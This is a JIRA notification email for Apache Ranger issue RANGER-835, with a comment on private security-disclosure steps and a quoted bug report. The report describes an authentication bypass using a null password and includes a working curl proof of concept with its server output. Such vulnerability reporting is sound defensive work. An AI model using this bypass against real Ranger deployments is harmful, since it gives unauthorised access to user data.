[jira] [Commented] (RANGER-835) Authentication bypass in Ranger API

Wed, 10 Feb 2016 11:45:56 -0800 

    [ 
https://issues.apache.org/jira/browse/RANGER-835?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15141509#comment-15141509
 ] 

Larry McCay commented on RANGER-835:
------------------------------------

[~dillidorai] - 

The fact that #15 would leak implementation details and the ability to reverse 
engineer an exploit if you were to follow it does not explicitly require that 
such things be made public. Since Ranger is not using svn it is perfectly 
acceptable to not follow #15 - as you have pointed out.

Steps #9-12 clearly describe that the details be discussed and agreed upon in 
private on either the project security or private email lists. PPMC members are 
encouraged to review and discuss the approach taken for such issues on those 
lists.

Thanks again.

> Authentication bypass in Ranger API
> -----------------------------------
>
>                 Key: RANGER-835
>                 URL: https://issues.apache.org/jira/browse/RANGER-835
>             Project: Ranger
>          Issue Type: Bug
>          Components: Ranger
>    Affects Versions: 0.5.0
>            Reporter: Jim Halfpenny
>            Priority: Critical
>              Labels: authentication, security, vulnerability
>             Fix For: 0.5.1, 0.6.0
>
>
> Authentication to the Ranger API can be trivially bypassed by sending a valid 
> username along with a null password. API authentication appears to work 
> correctly, rejecting requests if the password is incorrect but allows 
> requests where no password has been sent.
> The example below uses curl to demonstrate this issue by retrieving a list of 
> the users.
> $ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users
> *   Trying 127.0.0.1...
> * Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
> * Server auth using Basic with user 'admin'
> > HEAD /service/xusers/users HTTP/1.1
> > Host: 127.0.0.1:6080
> > Authorization: Basic YWRtaW46
> > User-Agent: curl/7.43.0
> > Accept: */*
> > 
> < HTTP/1.1 200 OK
> < Server: Apache-Coyote/1.1
> < Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
> < Content-Type: application/xml
> < Content-Length: 0
> < Date: Fri, 05 Feb 2016 11:41:16 GMT
> < 
> <?xml version="1.0" encoding="UTF-8" 
> standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

Reply via email to